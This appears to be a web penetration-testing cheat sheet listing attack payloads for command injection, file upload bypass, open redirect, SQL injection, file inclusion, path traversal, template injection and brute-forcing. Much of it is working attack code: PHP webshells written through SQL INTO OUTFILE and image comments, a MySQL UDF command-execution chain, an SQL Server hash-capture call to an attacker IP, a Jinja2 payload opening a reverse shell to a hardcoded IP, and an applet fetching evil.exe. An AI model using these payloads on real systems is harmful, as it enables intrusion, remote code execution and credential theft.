Skip to content

Web

Vulnerabilities

Command Injection

Bypass

w\h\o\a\m\i
\w\h\o\a\m\i

'html', 'htm', 'js', 'jsb', 'mhtml', 'mht',
**'php', 'phtml', 'php3', 'php4', 'php5', 'phps',**
'shtml', 'jhtml', 'pl', 'py', 'cgi', 'sh', 'ksh', 'bsh', 'c', 'htaccess', 'htpasswd',
'exe', 'scr', 'dll', 'msi', 'vbs', 'bat', 'com', 'pif', 'cmd', 'vxd', 'cpl', 'empty'
Tools

CRLF

Tools

Payloads

CSRF

Tools

File Upload

Bypass

  • Null Byte: %00 to bypass file name restrictions (wpes.php%00.png)
  • Suffix file name with % (example.php%)
  • Double Extensions: wpes.png.php valid.txt.php
  • Altering content type
  • Magic number: (Example: gif: GIF89a;)
  • Code in image comment:
    • exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' lo.jpg

Alternative Extensions

  • PHP - pht, phpt, phtml, php3, php4, php5, php6, php7
  • CFM - cfml, cfc, dbm
  • ASP - aspx
  • Perl - pl, pm, cgi, lib
  • JSP - jspx, jsw, jsv, jspf

Open Redirect

Scenarios

  • Grab tokens via mis-configured apps/login flows
  • Bypassing blacklists for SSRF/RCE
  • XSS via "location.href = 'javascript:alert(0)1'"
  • Taking advantage of fileuploads and mobile devices

Bypasses

https%3A%2F%2Fmysite.com%2F
https%3A%2F%2Fexample.com%2F%3Freturnurl%3D%2F%2Fmysite.com%2F
\/yoururl.com
\/\/yoururl.com
\\yoururl.com
//yoururl.com
//theirsite@yoursite.com
https://yoursite?c=.theirsite.com/
https://yoursite.com#.theirsite.com/
https://yoursite.com\.thersite.com/
//%2F/yoursite.com
////yoursite.com
https://theirsite.computer/ - (if they just check for *theirsite.com*, .computer is a valid tld!
https://theirsite.com.mysite.com - (Treat their domain as subdomain to yours)
/%0D/yoursite.com - (Also try %09, %00, %0a, %07)
java%0d%0ascript%0d%0a:alert(0), j%0d%0aava%0d%0aas%0d%0acrip%0d%0at%0d%0a:confirm`0` ,java%07script:prompt`0` ,java%09scrip%07t:prompt`0`
https://www.bugbountynotes.com/training/tutorial?id=1

SSRF

Tools

SQL Injection

Tools

Payload

  • Combines blind command injection and blind sql injection (mysql) in one payload (works with no quotes/single quotes and double quotes):
  • WebShell over MySQL: SELECT '<?php echo shell_exec($_GET['c']); ?>' INTO OUTFILE '/var/www/html/example.php'
  • User Defined Functions (UDF) (sqlmap/udf/mysql) 
    SELECT @@plugin_dir;
PowerShell$ Convert-Dll -DllPath lib_mysqludf_sys.dll -OutputPath bytes.txt
SELECT CHAR(64,64,....) INTO OUTFILE '<@@plugin_dir>/lib_mysqludf_sys.dll' FIELDS ESCAPED BY '';
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.dll';
SELECT sys_eval('whoami');
  • Simple payloads: 
    ' or 1=1 LIMIT 1 --
' or 1=1 LIMIT 1 -- -
' or 1=1 LIMIT 1#
'or 1#
' or 1=1 --
' or 1=1 -- -
  • Order by to get column count: 1337 order by N
  • Read file: LOAD_FILE('/etc/passwd')
  • Read from information schema: 
    union select 1,2,group_concat(distinct table_schema separator ',') from information_schema.tables LIMIT 1,1
union select 1,2,group_concat(distinct table_name separator ',') from information_schema.tables where table_schema = 'security' LIMIT 1,1
  • Write to file: select 1,2,3,4,"<?php echo system($_GET['cmd']); ?>",6 INTO OUTFILE 'C:\htdocs\webroot\shell.php'
  • SQL Server
    • Run Responder and do following to capture hashes: EXEC(master..xp_dirtree('\\(ATTACKER IP ADDRESS)\foo')--
    • Add a trigger to do a malicious action (price 0)

Language Specific

Practice

LFI / RFI

Payloads

  • including uploaded files
  • include data:// or php://input, php://filter pseudo protocol
  • including logs
  • including /proc/self/environ
  • include session files - (usually names /tmp/sess_SESSIONID)
  • include other files created by PHP application
  • C:\Windows\Temp\php<16-bit-random>.TMP without bruteforce can do inc=C:\Windows\Temp\php<<

LFI to RCE

  • RCE with TXT upload
    • Expose .txt file and use a vulnerable include to include the txt file into code (evil.txt.php).
    • PHP config can be used to disable URL file access. But still local files can be accessed (allow_url_fopen / allow_url_include)
  • RCE with Logs
    • Use NC to write logs with malicious content to access_logs.
    • Connect and just send the attack string (In user-agent etc.).
    • Then include the log file (local file inclusion)
  • RCE over SQLi
    • Return <?php echo "test"?> from SQL and see results to check if RCE is possible over SQLi

PHP Wrappers

  • File upload with POST data
    • curl -s --data "<?system('ls -la');?>" "http://target.host/web.php?file_path=php://input%00"
  • Base64 encode the LFI
    • http://X.X.X.X/?page=php://filter/convert.base64-encode/resource=(PHP FILE NAME NO EXTENSION)

Path Traversal

Payloads

../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
..././
...\.\

Server Side Template Injection (SSTI)

  • Payloads:
    • Jinja2 
      {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']}}{%endif%}{% endfor%}

      {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"1 92.90.172.2\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\"]);'")}}{%endif%}{% endfor %}

Client Side Attacks

XSS

Tools

Payloads

Applet

javac Java.java
echo “Permissions: all-­‐permissions” > /root/manifest.txt
    jar cvf Java.jar Java.class
    added manifest
    adding: Java.class(in = 1233) (out= 709)(deflated 42%)

keytool -­‐genkey -­‐alias signapplet -­‐keystore mykeystore -­‐keypass mykeypass -­‐storepass password123

jarsigner -­‐keystore mykeystore -­‐storepass password123 -­‐keypass mykeypass -­‐signedjar SignedJava.jar Java.jar signapplet

echo '<applet width="1" height="1" id="Java Secure" code="Java.class" archive="SignedJava.jar"><param name="1" value="http://192.168.10.5:80/evil.exe"></applet>' > /var/www/java.html

Other

Other

Scenarios

Techniques

Discovery and Enumeration

WAF Bypasses

SSL /TLS Attacks

Brute-forcing

POST

hydra -l (USERNAME) -P /path/to/wordlist.txt (TARGET IP ADDRESS) \
  http-post-form "/URI/path/to/login.php:(HTML FORM USERNAME ATTRIBUTE)=^USER^&(HTML FORM PASSWORD ATTRIBUTE)=^PASS^&Login=Login:(FAILED LOGIN MESSAGE)"

GET

hydra -l admin -P /pwnt/passwords/wordlists/rockyou.txt (TARGET IP ADDRESS) \
  http-get-form "/login.php:username=^USER^&password=^PASS^&Login=Login:Please Login|Bad Request"

Fuzzing

Cookies 

wfuzz -z \
 file,/infosec/SecLists/Passwords/Common-Credentials/10-million-password-list-top-500.txt \
 -b passwd=FUZZ http://(TARGET IP ADDRESS):(TARGET PORT)

Defense

CMS

Drupal

Wordpress

  • Version discovery** 
    curl -s 192.168.56.102/wordpress/ | grep generator
curl -s 192.168.56.102/wordpress/readme.html | grep Version
curl -s 192.168.56.102/wordpress/wp-login.php | grep "ver="
  • User enumeration 
    for i in $(seq 1 5); do curl -sL 192.168.110.105/wordpress/?author=$i | grep '<title>'; done

// When 'stop-user-enumeration' plugin installed
curl -i -sL '192.168.56.102/wordpress/?wp-comments-post&author=1' | grep '<title>'
curl -sL 192.168.56.102/wordpress/?wp-comments-post -d author=1 | grep '<title>'

// Rest API (4.7+)
curl -s http://localhost/wp-json/wp/v2/users
  • Theme and plugin enumeration**
    • /wordpress_site/wp-content/plugins/
    • /wordpress_site/wp-content/themes/ 
      wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/CMS/wp_plugins.fuzz.txt --hc 404 192.168.56.104/wordpress/FUZZ
nmap -sV -p 80 192.168.56.102 --script=http-wordpress-enum.nse --script-args=http-wordpress-enum.root=/wordpress/
  • Enumerate users, plugins and themes 
    wpscan -u http://192.168.110.105/wordpress/ -e u,ap,at

Joomla

Moodle

SilverStripe

Sharepoint

  • Important files:
    • /_layouts/viewlsts.aspx​

Tools

  • BurpSuite
  • ADAPT is a tool that performs automated Penetration Testing for WebApps https://github.com/secdec/adapt 
    * OTG-IDENT-004 – Account Enumeration
* OTG-AUTHN-001 - Testing for Credentials Transported over an Encrypted Channel
* OTG-AUTHN-002 – Default Credentials
* OTG-AUTHN-003 - Testing for Weak lock out mechanism
* OTG-AUTHZ-001 – Directory Traversal
* OTG-CONFIG-002 - Test Application Platform Configuration
* OTG-CONFIG-006 – Test HTTP Methods
* OTG-CRYPST-001 - Testing for Weak SSL/TLS Ciphers, Insufficient Transport Layer Protection
* OTG-CRYPST-002 - Testing for Padding Oracle
* OTG-ERR-001 - Testing for Error Code
* OTG-ERR-002 – Testing for Stack Traces
* OTG-INFO-002 – Fingerprinting the Webserver
* OTG-INPVAL-001 - Testing for Reflected Cross site scripting
* OTG-INPVAL-002 - Testing for Stored Cross site scripting
* OTG-INPVAL-003 – HTTP Verb Tampering
* OTG-SESS-001 - Testing for Session Management Schema
* OTG-SESS-002 – Cookie Attributes
  • Hawkeye - Project security, vulnerability and general risk highlighting tool: https://github.com/hawkeyesec/scanner-cli
  • Adobe Experience Manager (AEM) hacker toolset: https://github.com/0ang3el/aem-hacker

Practice

  • Login, registration, change password, change email, confirmation of email update

Pending References